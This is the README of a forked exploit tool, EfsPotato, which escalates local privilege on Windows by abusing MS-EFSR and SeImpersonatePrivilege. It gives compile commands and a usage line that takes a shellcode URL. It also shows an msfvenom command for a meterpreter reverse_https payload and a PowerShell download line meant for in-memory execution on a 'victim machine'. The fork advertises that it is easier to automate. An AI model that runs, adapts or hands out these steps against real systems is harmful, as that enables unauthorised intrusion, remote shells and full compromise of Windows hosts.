
Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).

Primary LanguageC#

Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).

This fork improves the original exploit by removing the manual step of needing to run the exe in an interactive session. You can use this in a more automated fashion, which can help save time.


#for 4.x
csc.exe EfsPotato.cs -nowarn:1691,618
csc /platform:x86 EfsPotato.cs -nowarn:1691,618

#for 2.0/3.5
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs -nowarn:1691,618
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs -nowarn:1691,618

#on Linux
mcs EfsPotato.cs


usage: EfsPotato <shellcode_url> [pipe]
  pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)

Running in-memory only with reflection

You can also run EfsPotato directly in memory from Powershell using reflection:

# craft shellcode on attacking machine
msfvenom -p windows/x64/meterpreter/reverse_https -f raw -o /var/www/html/shellcode

# run exploit on victim machine
$b=(New-object system.net.webclient).DownloadData("")